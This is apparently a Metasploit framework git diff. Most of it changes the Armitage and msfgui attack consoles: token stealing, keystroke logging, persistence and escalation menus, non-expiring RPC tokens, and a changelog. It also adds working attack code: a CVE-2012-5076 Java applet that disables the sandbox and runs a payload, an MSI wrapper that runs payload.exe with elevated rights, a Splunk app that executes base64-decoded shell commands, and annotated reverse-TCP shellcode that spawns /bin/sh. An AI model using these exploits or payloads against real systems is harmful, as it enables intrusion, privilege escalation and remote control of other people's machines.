quickListDialog("Choose a session", "Select", @("sid", "sid", "session_host", "info"), @data, $width => 640, $height => 240, lambda({
[$call : $1];
}, $call => $4), \$tablef);
};
$actions["SESSION"] = lambda(&chooseSession);
# set up an action to pop up a file chooser for different file type values.
$actions["RHOST"] = {

7
external/source/armitage/scripts/gui.sl vendored
View File

@ -475,7 +475,12 @@ sub gotoFile {
return lambda({
local('$exception');
try {
[[Desktop getDesktop] open: $f];
if ([Desktop isDesktopSupported]) {
[[Desktop getDesktop] open: $f];
}
else {
ask("Browse to this file:", $f);
}
}
catch $exception {
showError("Could not open $f $+ \n $+ $exception");

10
external/source/armitage/scripts/jobs.sl vendored
View File

@ -356,6 +356,16 @@ sub _launch_dialog {
if (!isShift($1)) {
[$dialog setVisible: 0];
}
# fix some module options...
if ($command eq "windows/manage/persistence") {
if ('REXE' in $options) {
$options['ACTION'] = 'REXE';
}
else {
$options['ACTION'] = 'TEMPLATE';
}
}
# it's go time buddy... time to filter some stuff...
($type, $command, $options) = filter_data("user_launch", $type, $command, $options);

24
external/source/armitage/scripts/menus.sl vendored
View File

@ -188,7 +188,12 @@ sub main_attack_items {
sub gotoURL {
return lambda({
[[Desktop getDesktop] browse: $url];
if ([Desktop isDesktopSupported]) {
[[Desktop getDesktop] browse: $url];
}
else {
ask("Browse to this URL:", $url);
}
}, $url => [[new URL: $1] toURI]);
}
@ -234,6 +239,23 @@ sub init_menus {
dynmenu($top, "Help", 'H', &help_items);
# setup some global keyboard shortcuts...
[$frame bindKey: "Ctrl+I", {
thread({
chooseSession($null, $null, $null, {
local('$session');
$session = sessionData($1);
if ($session is $null) {
showError("Session $1 does not exist");
}
else if ($session['desc'] eq "Meterpreter") {
createMeterpreterTab($1);
}
else {
createShellSessionTab(\$session, $sid => $1);
}
});
});
}];
[$frame bindKey: "Ctrl+N", { thread(&createConsoleTab); }];
[$frame bindKey: "Ctrl+W", { [$frame openActiveTab]; }];
[$frame bindKey: "Ctrl+D", { [$frame closeActiveTab]; }];

37
external/source/armitage/scripts/meterpreter.sl vendored
View File

@ -104,13 +104,16 @@ sub parseMeterpreter {
}
sub interpretMeterpreterCommand {
if ([$1 getActionCommand] eq "shell") {
local('$c');
$c = [lc([$1 getActionCommand] . "") trim];
if ($c eq "shell") {
createShellTab($sid);
}
else if ([$1 getActionCommand] eq "screenshot") {
else if ($c eq "screenshot") {
[createScreenshotViewer($sid)];
}
else if ([$1 getActionCommand] eq "webcam_snap") {
else if ($c eq "webcam_snap") {
[createWebcamViewer($sid)];
}
}
@ -168,7 +171,9 @@ sub showMeterpreterMenu {
}, $sid => "$sid"));
item($j, "Escalate Privileges", 'E', lambda({
showPostModules($sid, "*escalate*");
showPostModules($sid, "*escalate*",
ohash(exploit => buildTree(filter({ return iff("*windows/local/*" iswm $1, $1); }, @exploits)))
);
}, $sid => "$sid"));
item($j, "Steal Token" , "S", lambda({
@ -191,11 +196,15 @@ sub showMeterpreterMenu {
}, $sid => "$sid"));
item($j, "Persist", 'P', lambda({
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
thread(lambda({
launch_dialog("Persistence", "post", "windows/manage/persistence", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
}, \$sid));
}, $sid => "$sid"));
item($j, "Pass Session", 'S', lambda({
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
thread(lambda({
launch_dialog("Pass Session", "post", "windows/manage/payload_inject", 1, $null, %(SESSION => $sid, LPORT => %MSF_GLOBAL['LPORT'], HANDLER => "0"));
}, \$sid));
}, $sid => "$sid"));
setupMenu($j, "meterpreter_access", @($sid));
@ -241,7 +250,9 @@ sub showMeterpreterMenu {
item($j, "Show Processes", 'P', lambda({ createProcessBrowser($sid); }, $sid => "$sid"));
if ("*win*" iswm $platform) {
item($j, "Log Keystrokes", 'K', lambda({
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
thread(lambda({
launch_dialog("Log Keystrokes", "post", "windows/capture/keylog_recorder", 1, $null, %(SESSION => $sid, MIGRATE => 1, ShowKeystrokes => 1));
}, \$sid));
}, $sid => "$sid"));
}
@ -305,6 +316,9 @@ sub launch_msf_scans {
if ('RPORT' in %o) {
$port = %o['RPORT']['default'];
push(%ports[$port], $scanner);
if ($port == 80) {
push(%ports['443'], $scanner);
}
}
safetyCheck();
@ -313,7 +327,7 @@ sub launch_msf_scans {
# add these ports to our list of ports to scan.. these come from querying all of Metasploit's modules
# for the default ports
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902)) {
foreach $port (@(50000, 21, 1720, 80, 443, 143, 3306, 1521, 110, 5432, 50013, 25, 161, 22, 23, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 623, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985)) {
$temp = %ports[$port];
}
@ -343,7 +357,12 @@ sub launch_msf_scans {
if ($port in %ports) {
$modules = %ports[$port];
foreach $module ($modules) {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
if ($port == 443) {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24, SSL => "1")));
}
else {
push(@launch, @($module, %(RHOSTS => join(", ", $hosts), RPORT => $port, THREADS => 24)));
}
}
}
}

12
external/source/armitage/scripts/modules.sl vendored
View File

@ -251,7 +251,7 @@ sub showExploitModules {
# shows the post modules compatible with a session... for this to work, the
# code that creates the module browser must call: let(&showPostModules, $tree => ..., $search => ...)
sub showPostModules {
local('@allowed $2');
local('@allowed $2 $3');
@allowed = getOS(sessionToOS($1));
fork({
local('$modules %list $model');
@ -270,7 +270,13 @@ sub showPostModules {
$modules = filter(lambda({ return iff($filter iswm $1, $1); }, \$filter), $modules);
}
%list = ohash(post => buildTree($modules));
if ($base is $null) {
%list = ohash(post => buildTree($modules));
}
else {
%list = $base;
%list['post'] = buildTree($modules);
}
$model = treeNodes($null, %list);
dispatchEvent(lambda({
@ -282,7 +288,7 @@ sub showPostModules {
}
[$search setText: ""];
}, \$search, \$tree, \$model));
}, \$tree, \$search, $sid => $1, \$client, \@allowed, $filter => $2);
}, \$tree, \$search, $sid => $1, \$client, \@allowed, $filter => $2, $base => $3);
}
sub createModuleBrowserTab {

40
external/source/armitage/scripts/passhash.sl vendored
View File

@ -96,6 +96,33 @@ sub createCredentialsTab {
($dialog, $table, $model) = show_hashes("", 320);
[$dialog removeAll];
addMouseListener($table, lambda({
if ([$1 isPopupTrigger]) {
local('$popup $entries');
$popup = [new JPopupMenu];
$entries = [$model getSelectedValuesFromColumns: $table, @("user", "pass", "host")];
item($popup, "Delete", 'D', lambda({
local('$queue $entry $user $pass $host');
$queue = [new armitage.ConsoleQueue: $client];
foreach $entry ($entries) {
($user, $pass, $host) = $entry;
[$queue addCommand: $null, "creds -d $host -u $user -P $pass"];
}
[$queue addCommand: "x", "creds -h"];
[$queue addListener: lambda({
[$queue stop];
refreshCredsTable($model, $null);
}, \$model, \$queue)];
[$queue start];
[$queue stop];
}, \$table, \$model, \$entries));
[$popup show: [$1 getSource], [$1 getX], [$1 getY]];
}
}, \$table, \$model));
$panel = [new JPanel];
[$panel setLayout: [new BorderLayout]];
[$panel add: [new JScrollPane: $table], [BorderLayout CENTER]];
@ -297,19 +324,24 @@ sub show_login_dialog {
}
sub createUserPassFile {
local('$handle $user $pass $type $row $2 $name');
local('$handle $user $pass $type $row $2 $name %entries');
$name = "userpass" . rand(10000) . ".txt";
$handle = openf("> $+ $name");
# loop through our entries and store them
%entries = ohash();
foreach $row ($1) {
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
if ($type eq "password" || $type eq $2) {
println($handle, "$user $pass");
%entries["$user $pass"] = "$user $pass";
}
else {
println($handle, "$user");
%entries[$user] = $user;
}
}
# print out unique entry values
$handle = openf("> $+ $name");
printAll($handle, values(%entries));
closef($handle);
if ($client !is $mclient) {

19
external/source/armitage/scripts/process.sl vendored
View File

@ -27,6 +27,12 @@ sub parseProcessList {
# REMOVEME--this is a backwards compatability hack.
@rows = parseTextTable($2, @("PID", "Name", "Arch", "Session", "User", "Path"));
}
# this is the format for Java meterpreter
if (size(@rows) == 0) {
@rows = parseTextTable($2, @("PID", "Name", "Arch", "User", "Path"));
}
foreach $row (@rows) {
[%processes[$1] addEntry: $row];
}
@ -69,7 +75,7 @@ sub createProcessBrowser {
[$panel add: [new JScrollPane: $table], [BorderLayout CENTER]];
local('$a $b $bb $c');
local('$a $b $bb $bbb $c');
$a = [new JButton: "Kill"];
[$a addActionListener: lambda({
local('$procs $v');
@ -99,6 +105,15 @@ sub createProcessBrowser {
}
}, $m => $1, \$table, \$model)];
$bbb = [new JButton: "Steal Token"];
[$bbb addActionListener: lambda({
local('$v');
$v = [$model getSelectedValue: $table];
if ($v !is $null) {
m_cmd_callback($m, "steal_token $v", { if ($0 eq "end") { showError(["$2" trim]); } });
}
}, $m => $1, \$table, \$model)];
$c = [new JButton: "Refresh"];
[$c addActionListener:
lambda({
@ -106,7 +121,7 @@ sub createProcessBrowser {
}, $m => $1)
];
[$panel add: center($a, $b, $bb, $c), [BorderLayout SOUTH]];
[$panel add: center($a, $b, $bb, $bbb, $c), [BorderLayout SOUTH]];
[$frame addTab: "Processes $1", $panel, $null, "Processes " . sessionToHost($1)];
m_cmd($1, "ps");

14
external/source/armitage/scripts/server.sl vendored
View File

@ -355,7 +355,7 @@ sub client {
sub main {
global('$client $mclient');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
@ -400,9 +400,6 @@ sub main {
$mclient = $client;
initConsolePool(); # this needs to happen... right now.
# set the LHOST to whatever the user specified
call_async($client, "core.setg", "LHOST", $host);
# we need this global to be set so our reverse listeners work as expected.
$MY_ADDRESS = $host;
@ -423,6 +420,13 @@ sub main {
$lock_lock = semaphore(1);
$cach_lock = semaphore(1);
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
$console = createConsole($client);
call($client, "console.write", $console, "setg LHOST $host $+ \n");
sleep(2000);
# absorb the output of this command which is LHOST => ...
call($client, "console.read", $console);
#
# create a thread to push console messages to the event queue for all clients.
#
@ -437,7 +441,7 @@ sub main {
release($poll_lock);
}
}
}, \$client, \$poll_lock, \@events, $console => createConsole($client));
}, \$client, \$poll_lock, \@events, \$console);
#
# Create a shared hash that contains a thread for each session...

13
external/source/armitage/scripts/shell.sl vendored
View File

@ -163,6 +163,10 @@ global('%shells $ashell $achannel %maxq %wait');
# make our shell heuristic tolerant of prompts like this.
%wait[$achannel] = $null;
}
else if (size($v) > 0 && $v[-1] ismatch '.*?:') {
# make our shell heuristic tolerant of more prompts... this is from the time command
%wait[$achannel] = $null;
}
else if (size($v) > 0 && $v[-1] !ismatch '(.*?):\\\\.*?\\>') {
m_cmd($1, "read $achannel");
}
@ -254,7 +258,14 @@ sub showShellMenu {
}
item($1, "Post Modules", 'P', lambda({
showPostModules($sid);
if ("*Windows*" iswm sessionToOS($sid)) {
showPostModules($sid);
}
else {
showPostModules($sid, "*",
ohash(exploit => buildTree(filter({ return iff("*u*x/local/*" iswm $1, $1); }, @exploits)))
);
}
}, \$sid));
separator($1);

5
external/source/armitage/scripts/util.sl vendored
View File

@ -152,7 +152,10 @@ sub createConsoleTab {
sub setg {
%MSF_GLOBAL[$1] = $2;
call_async($client, "core.setg", $1, $2);
local('$c');
$c = createConsole($client);
call_async($client, "console.write", $c, "setg $1 $2 $+ \n");
call_async($client, "console.release", $c);
}
sub createDefaultHandler {

3
external/source/armitage/src/armitage/ConsoleClient.java vendored
View File

@ -104,6 +104,9 @@ public class ConsoleClient implements Runnable, ActionListener {
if (destroyCommand != null) {
((RpcAsync)connection).execute_async(destroyCommand, new Object[] { session });
}
/* we don't need to keep reading from this console */
kill();
}
protected void finalize() {

15
external/source/armitage/src/msf/MeterpreterSession.java vendored
View File

@ -164,6 +164,21 @@ public class MeterpreterSession implements Runnable {
readUntilSuccessful(c, false);
return;
}
else if (c.text.startsWith("add_user") && !teammode) {
/* when -h [host] is specified, attempts to add a user on another
host. In this case, output is split into multiple chunks.
This applies to add_localgroup_user and add_group_user too. */
readUntilSuccessful(c, false);
return;
}
else if (c.text.startsWith("add_localgroup_user") && !teammode) {
readUntilSuccessful(c, false);
return;
}
else if (c.text.startsWith("add_group_user") && !teammode) {
readUntilSuccessful(c, false);
return;
}
//System.err.println("(" + session + ") latency: " + (System.currentTimeMillis() - c.start) + " -- " + c.text);

7
external/source/armitage/src/msf/MsgRpcImpl.java vendored
View File

@ -57,6 +57,13 @@ public class MsgRpcImpl extends RpcConnectionImpl {
/* login to msf server */
Object[] params = new Object[]{ username, password };
Map results = exec("auth.login",params);
/* save the temp token (lasts for 5 minutes of inactivity) */
rpcToken = results.get("token").toString();
/* generate a non-expiring token and use that */
params = new Object[]{ rpcToken };
results = exec("auth.token_generate", params);
rpcToken = results.get("token").toString();
}

13
external/source/armitage/src/ui/KeyBindings.java vendored
View File

@ -33,10 +33,6 @@ public class KeyBindings implements KeyEventDispatcher {
}
public boolean dispatchKeyEvent(KeyEvent ev) {
if (ev.getID() != KeyEvent.KEY_PRESSED) {
return false;
}
StringBuffer description = new StringBuffer();
if (ev.getModifiers() != 0) {
description.append(getKeyModifiers(ev));
@ -46,9 +42,14 @@ public class KeyBindings implements KeyEventDispatcher {
synchronized (this) {
if (bindings.containsKey(description.toString())) {
SwingUtilities.invokeLater(new ExecuteBinding(description.toString(), (KeyHandler)bindings.get(description.toString())));
ev.consume();
return true;
if (ev.getID() != KeyEvent.KEY_PRESSED) {
return false;
}
else {
SwingUtilities.invokeLater(new ExecuteBinding(description.toString(), (KeyHandler)bindings.get(description.toString())));
return true;
}
}
}

40
external/source/armitage/whatsnew.txt vendored
View File

@ -1,6 +1,46 @@
Armitage Changelog
==================
26 Nov 12 (tested against msf 16114)
---------
- Windows command shell tab is now friendlier to commands that prompt
for input (e.g., time command)
- [host] -> Meterpreter -> Access -> Escalate Privileges now shows all
the framework's new exploit/windows/local modules too
- [host] -> Shell -> Post Modules now shows the framework's unix/local
and exploit/linux/local modules
- Added Ctrl+I shortcut. Lets you choose a session to interact with.
- Added Steal Token button to Processes dialog.
- Armitage now asks Metasploit for a non-expiring authentication token.
This will prevent Armitage from losing its access to msfrpcd when you
put your computer to sleep or pause the VM running Metasploit.
- add_user and add_[local]group_user now show all of their output when
the -h flag is used to operate on a remote host.
- added a Delete menu to creds table. Right-click a cred to delete it
Cortana Updates (for scripters)
--------
- aliased &data_delete to &data_clear to match the documentation.
- &file_get, &loot_get, and &file_content no longer delete the remote
file when connected to a teamserver.
16 Oct 12 (tested against msf 15972)
---------
- Added port 5985 to MSF Scans list.
- Meterpreter -> Access -> Persistence sets ACTION option for you
- Changed how LHOST and LPORT are set globally to prevent Ruby
character encoding conversion error in the framework.
- Pass Session, Log Keystrokes, and Persist now query module info
in a separate thread (avoids a deadlock opportunity)
- Armitage now shows folder/URL in a popup dialog for environments
where JDesktop API to open them directly is not supported
- Check all credentials option now filters the list to avoid trying
a pair of credentials twice.
- Armitage's exploit payload selection now selects cmd/unix/interact
when appropriate.
- Explore -> Processes now works with Java Meterpreter again.
- MSF Scans feature now runs http_version against port 443
5 Sept 12 (tested against msf r15804)
---------
- Setup dialog now trims host, port, user, and pass fields.

69
external/source/exploits/cve-2012-5076/Exploit.java vendored Executable file
View File

@ -0,0 +1,69 @@
import java.applet.Applet;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
public class Exploit extends Applet
{
public Exploit()
{
}
public byte[] hex2Byte(String str)
{
byte[] bytes = new byte[str.length() / 2];
for (int i = 0; i < bytes.length; i++)
{
bytes[i] = (byte) Integer
.parseInt(str.substring(2 * i, 2 * i + 2), 16);
}
return bytes;
}
public void init()
{
try
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream("MyPayload.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
Object obj = genericconstructor.create(new Object[] {});
Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
Class class1 = (Class)method.invoke(obj, new Object[] {
//byte_payload
buffer
});
class1.newInstance();
//System.out.println("SecurityManager:" + System.getSecurityManager());
//class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Exception exception)
{
//exception.printStackTrace();
}
}
}

18
external/source/exploits/cve-2012-5076/Makefile vendored Normal file
View File

@ -0,0 +1,18 @@
# rt.jar must be in the classpath!
CLASSES = \
Exploit.java \
MyPayload.java
.SUFFIXES: .java .class
.java.class:
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2012-5076/
mv MyPayload.class ../../../../data/exploits/cve-2012-5076/
clean:
rm -rf *.class

33
external/source/exploits/cve-2012-5076/MyPayload.java vendored Executable file
View File

@ -0,0 +1,33 @@
import java.security.*;
public class MyPayload
implements PrivilegedExceptionAction
{
public MyPayload()
{
try
{
AccessController.doPrivileged(this);
}
catch(PrivilegedActionException e)
{
//e.printStackTrace();
}
}
public Object run()
throws Exception
{
System.setSecurityManager(null);
return null;
}
public static void r()
throws Exception
{
//System.out.println("hello!");
}
}

29
external/source/exploits/exec_payload_msi/exec_payload.wxs vendored Normal file
View File

@ -0,0 +1,29 @@
<?xml version='1.0' encoding='windows-1252'?>
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
<Product Name='Foobar 1.0' Id='*'
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />
<Media Id='1' Cabinet='product.cab' EmbedCab='yes' />
<Directory Id='TARGETDIR' Name='SourceDir'>
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
<Condition>0</Condition>
</Component>
</Directory>
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
<CustomAction Id='ExecNotepad' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
<Feature Id='Complete' Level='1'>
<ComponentRef Id='MyComponent' />
</Feature>
<InstallExecuteSequence>
<ResolveSource After="CostInitialize" />
<Custom Action="ExecNotepad" After="InstallInitialize" />
</InstallExecuteSequence>
</Product>
</Wix>

15
external/source/exploits/splunk/upload_app_exec/bin/msf_exec.py vendored Executable file
View File

@ -0,0 +1,15 @@
import sys
import base64
import splunk.Intersplunk
results = []
try:
sys.modules['os'].system(base64.b64decode(sys.argv[1]))
except:
import traceback
stack = traceback.format_exc()
results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
splunk.Intersplunk.outputResults(results)

7
external/source/exploits/splunk/upload_app_exec/default/app.conf vendored Normal file
View File

@ -0,0 +1,7 @@
[launcher]
author=Marc Wickenden
description=Metasploit module spunk_upload_app_exec.rb
version=1.3.3.7
[ui]
is_visible = true

7
external/source/exploits/splunk/upload_app_exec/default/commands.conf vendored Normal file
View File

@ -0,0 +1,7 @@
[msf_exec]
type = python
filename = msf_exec.py
local = false
enableheader = false
streaming = false
perf_warn_limit = 0

2
external/source/exploits/splunk/upload_app_exec/metadata/default.meta vendored Normal file
View File

@ -0,0 +1,2 @@
[commands]
export = system

14
external/source/gui/msfguijava/src/msfgui/DraggableTabbedPane.java vendored
View File

@ -13,6 +13,7 @@ import java.awt.event.FocusListener;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.awt.event.MouseMotionAdapter;
import java.awt.event.MouseMotionListener;
import java.awt.event.WindowEvent;
import java.awt.event.WindowFocusListener;
import java.util.ArrayList;
@ -49,7 +50,16 @@ public class DraggableTabbedPane extends JTabbedPane{
static{
//Set up placeholder window. (Shows when moving tabs)
window = new JWindow();
window.getContentPane().add(new JLabel("Moving", JLabel.CENTER), java.awt.BorderLayout.CENTER);
JLabel lab = new JLabel("Moving", JLabel.CENTER);
lab.addMouseMotionListener(new MouseMotionListener() {
public void mouseMoved(MouseEvent e) {
window.setVisible(false);
}
public void mouseDragged(MouseEvent e) {
window.setVisible(false);
}
});
window.getContentPane().add(lab, java.awt.BorderLayout.CENTER);
window.setSize(300, 300);
}
@ -333,7 +343,7 @@ public class DraggableTabbedPane extends JTabbedPane{
//Set up dragging listener
addMouseMotionListener(new MouseMotionAdapter() {
public void mouseDragged(MouseEvent e) {
if (!dragging) {
if (!dragging && ((e.getModifiersEx() & MouseEvent.BUTTON1_DOWN_MASK) != 0)) {
// Gets the tab index based on the mouse position
int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
if (tabNumber < 0)

7
external/source/gui/msfguijava/src/msfgui/MainFrame.java vendored
View File

@ -423,7 +423,12 @@ nameloop: for (int i = 0; i < names.length; i++) {
public ActionListener getActor(final String modName, final String type, final RpcConnection rpcConn) {
return new ActionListener(){
public void actionPerformed(ActionEvent e) {
new ModulePopup(modName,rpcConn,type, MainFrame.this).setVisible(true);
//If we have saved options for this module, use those
Object modOptions = MsfguiApp.getPropertiesNode().get("modOptions");
if(modOptions != null && ((Map)modOptions).containsKey(type+" "+modName))
new ModulePopup(rpcConn, ((List)((Map)modOptions).get(type+" "+modName)).toArray(), MainFrame.this).setVisible(true);
else //otherwise go with the default
new ModulePopup(modName,rpcConn,type, MainFrame.this).setVisible(true);
}
};
}

7
external/source/gui/msfguijava/src/msfgui/MsfguiApp.java vendored
View File

@ -287,12 +287,19 @@ public class MsfguiApp extends SingleFrameApplication {
}
Map hash = (Map)args.get(2);
StringBuilder name = new StringBuilder(args.get(0) + " " + args.get(1));
//Save these options
if(!propRoot.containsKey("modOptions")) //first ensure option map exists
propRoot.put("modOptions", new HashMap());
((Map)propRoot.get("modOptions")).put(name.toString(), args);
//Generate display name
for(Object ento : hash.entrySet()){
Entry ent = (Entry)ento;
String propName = ent.getKey().toString();
if(propName.endsWith("HOST") || propName.endsWith("PORT") || propName.equals("PAYLOAD"))
name.append(" ").append(propName).append("-").append(ent.getValue());
}
//Make menu item
final JMenuItem item = new JMenuItem(name.toString());
item.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent e) {

3
external/source/gui/msfguijava/src/msfgui/RpcConnection.java vendored
View File

@ -114,7 +114,8 @@ public abstract class RpcConnection {
* @throws IOException
*/
protected void disconnect() throws SocketException, IOException{
connection.close();
if(connection != null)
connection.close();
}
/**

7
external/source/meterpreter/source/pssdk/README vendored Normal file
View File

@ -0,0 +1,7 @@
This directory must be populated with the libs and includes for the commercial
Packet SDK in order for the sniffer extension to build. This SDK is not
publicly available at this time.
The 32-bit lib should be copied to win32/pssdk.lib
The 64-bit lib should be copied to win64/pssdk.lib

0
lib/gemcache/ruby/1.9.1/gems/railties-3.2.2/guides/code/getting_started/public/favicon.ico → external/source/meterpreter/source/pssdk/include/.keep vendored
View File

0
lib/gemcache/ruby/1.9.1/gems/railties-3.2.2/lib/rails/generators/rails/app/templates/app/mailers/.empty_directory → external/source/meterpreter/source/pssdk/win32/.keep vendored
View File

0
lib/gemcache/ruby/1.9.1/gems/railties-3.2.2/lib/rails/generators/rails/app/templates/app/models/.empty_directory → external/source/meterpreter/source/pssdk/win64/.keep vendored
View File

18
external/source/shellcode/linux/ia32/Makefile vendored
View File

@ -1,4 +1,4 @@
STAGERS=stager_sock_bind stager_sock_bind_udp stager_sock_bind_icmp \
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
stager_egghunt stager_sock_find stager_sock_reverse \
stager_sock_reverse_icmp stager_sock_reverse_udp \
stager_sock_reverse_udp_dns
@ -30,8 +30,22 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
sed -e 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' \
-e 's/^/"/;s/$$/"/;$$ b;s/$$/+/;' > $@
# ljust(23) because the longest instruction is usually 5 bytes which takes 22
# characters including quotes
%.disasm: %.bin
@ndisasm -b 32 $< > $@
@ndisasm -b 32 $< > $*.tmp
@ruby -p -a -e ' \
$$F.shift; \
$$F[0].tap { |s| \
s.tr! "A-F", "a-f"; \
t=s.dup; \
s.clear; \
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
STDIN.eof? ? s<< " # " : s<< "+# "; \
}; \
$$_ = $$F.join(" ") + "\n"; \
' < $*.tmp > $@
@rm $*.tmp
$(SINGLE) $(STAGES) $(STAGERS): %: %.o
@echo "Building $@... (`wc -c $(<:.o=.bin)|awk '{print $$1}'` bytes)"

59
external/source/shellcode/linux/ia32/single_reverse_tcp_shell.asm vendored
View File

@ -31,49 +31,52 @@ GLOBAL _start
_start:
xor ebx, ebx
mul ebx
socket:
push ebx
inc ebx
push ebx
push byte 0x2
push byte 0x66
pop eax
mov ecx, esp
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
inc ebx ; 1 = SYS_SOCKET
push ebx ; type = 1 = SOCK_STREAM
push byte 0x2 ; domain = 2 = AF_INET
mov ecx, esp ; socketcall args
mov al, 0x66
int 0x80
xchg eax, ebx
; int dup2(int oldfd, int newfd);
dup:
pop ecx
pop ecx ; oldfd = 2, aka stderr
; newfd is in ebx, set above, and doesn't change until we're ready to call
; connect(2)
dup_loop:
mov al, 0x3f
mov al, 0x3f ; __NR_dup2
int 0x80
dec ecx
jns dup_loop
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
connect:
pop ebx
pop edx
push dword 0x0100007f
push word 0xbfbf
inc ebx
push bx
mov ecx, esp
mov al, 0x66
push eax
push ecx
push ebx
mov ecx, esp
inc ebx
push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
push 0xbfbf0002 ; addr->sin_port = 49087
; addr->sin_family = 2 = AF_INET
mov ecx, esp ; ecx = addr
mov al, 0x66 ; __NR_socketcall
push eax ; addrlen
push ecx ; addr
push ebx ; sockfd
mov bl, 0x3 ; 3 = SYS_CONNECT
mov ecx, esp ; socketcall args
int 0x80
; int execve(const char *filename, char *const argv[], char *const envp[]);
execve:
push edx
push edx ; NULL terminator for "/bin//sh"
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx, esp
push edx
push ebx
mov ecx, esp
mov al, 0x0b
mov ebx, esp ; filename
push edx ; NULL terminator for argv
push ebx ; pointer to "/bin//sh"
mov ecx, esp ; argv = pointer to pointer to "/bin//sh"
mov al, 0x0b ; __NR_execve
int 0x80

99
external/source/shellcode/linux/ia32/stager_sock_bind.asm vendored
View File

@ -1,14 +1,16 @@
;;
;
;
